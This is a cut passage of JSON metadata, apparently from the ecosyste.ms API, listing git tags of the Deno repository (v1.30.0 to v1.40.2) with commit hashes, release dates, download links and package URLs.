cy_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland